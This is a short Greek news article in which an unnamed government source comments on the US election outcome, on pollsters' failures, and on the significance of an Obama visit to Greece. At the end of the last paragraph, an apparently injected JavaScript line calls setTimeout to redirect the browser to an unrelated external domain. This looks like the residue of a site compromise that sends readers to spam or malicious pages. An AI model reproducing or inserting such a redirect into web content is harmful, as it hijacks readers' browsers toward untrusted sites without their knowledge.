Κυβερνητική πηγή: Η ελληνική κυβέρνηση είχε προετοιμαστεί και για τα δύο ενδεχόμενα

0
3

 

Στο αποτέλεσμα των αμερικανικών εκλογών αναφέρθηκε κυβερνητική πηγή που σχολίασε και την αποτυχία των δημοσκοπήσεων, οι οποίες τα τελευταία χρόνια δεν μπορούν να προβλέψουν οποιοδήποτε εκλογικό αποτέλεσμα τα τελευταία χρόνια, αναφέρει χαρακτηριστικά.

Όπως σημειώνει η κυβερνητική πηγή, που επικαλείται το Αθηναϊκό Πρακτορείο «η ελληνική κυβέρνηση είχε προετοιμαστεί και για τα δύο ενδεχόμενα, με δεδομένη την αποτυχία των δημοσκοπικών εταιρειών να προβλέψουν οποιοδήποτε εκλογικό αποτέλεσμα τα τελευταία χρόνια».

Η ίδια πηγή σημειώνει ότι «η επίσκεψη Ομπάμα είναι τεράστιας σημασίας με δεδομένο, πρώτον, το χρονοδιάγραμμα των διαπραγματεύσεων για β’ αξιολόγηση και χρέος και, δεύτερον, το γεγονός ότι παραμένει μεγάλη η σημασία που αποδίδει η αμερικανική εξωτερική πολιτική στην Ελλάδα και ότι δεν φαίνεται να προκύπτει ασυνέχεια τουλάχιστον ως προς αυτό το πεδίο. Φυσικά θα υπάρξουν μεταβολές στο εσωτερικό των ΗΠΑ, αλλά και στο διεθνές σύστημα, τις οποίες παρακολουθούμε στενά» αναφέρει και συμπληρώνει: «Ασφαλώς υπάρχει προβληματισμός για ζητήματα σεβασμού των ανθρωπίνων δικαιωμάτων και των δικαιωμάτων των μειονοτήτων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here